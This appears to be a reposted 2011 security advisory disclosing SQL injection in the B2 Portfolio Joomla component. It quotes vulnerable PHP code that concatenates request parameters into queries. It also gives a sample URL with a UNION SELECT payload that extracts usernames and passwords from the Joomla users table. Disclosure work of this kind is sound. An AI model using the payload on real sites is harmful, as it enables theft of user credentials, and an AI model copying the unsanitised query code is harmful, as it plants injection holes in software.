扫码分享
验证:
体验盒子B2 Portfolio Joomla Component 1.0.0 Multiple SQL Injection Vulnerability
NameB2 Portfolio
Vendorhttp://www.pulseextensions.com
Versions Affected 1.0.0
AuthorSalvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date2011-01-24
X. INDEX
I.ABOUT THE APPLICATION
II. DESCRIPTION
III.ANALYSIS
IV. SAMPLE CODE
V.FIX
I. ABOUT THE APPLICATION
________________________
B2 Portfolio is a Joomla component to give theuserthe
option to view details of a portfolio item by zoomingit
on hover, and to allow a full view by clicking.
II. DESCRIPTION
_______________
Some parameters are not properly sanitisedbeforebeing
used in SQL queries.
III. ANALYSIS
_____________
Summary:
A) Multiple SQL Injection
A) Multiple SQL Injection
_________________________
Idandwallidparametersarenotproperly sanitised
before being used in SQL queries. Thiscanbe exploited
to manipulate SQL queries by injecting arbitrary SQL code.
The following are the vulnerable functions:
function getcategoryname() {
$db =& JFactory::getDBO();
$default_category = JRequest::getVar('c',0);
if($default_category == "") {
$query_cat = 'SELECT default_category FROM #__b2portfolio_config';
$db->setQuery( $query_cat );
$default_category = $db->loadResult();
}
$query = 'SELECT * FROM #__b2portfolio_category where id='.$default_category;
$db->setQuery( $query );
$cat_data =$this->_db->loadObject($query);
return $cat_data;
}
function click() {
$db =& JFactory::getDBO();
$date =& JFactory::getDate();
$trackDate = $date->toFormat( '%Y-%m-%d' );
$query = 'UPDATE #__b2portfolio set click = ( click + 1 ) where id ='.$_GET['wallid'];
$db->setQuery( $query );
$db->query();
}
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
http://site/path/index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(username,0x34,password),3,4,5 FROM jos_users
V. FIX
______
No fix.
体验盒子
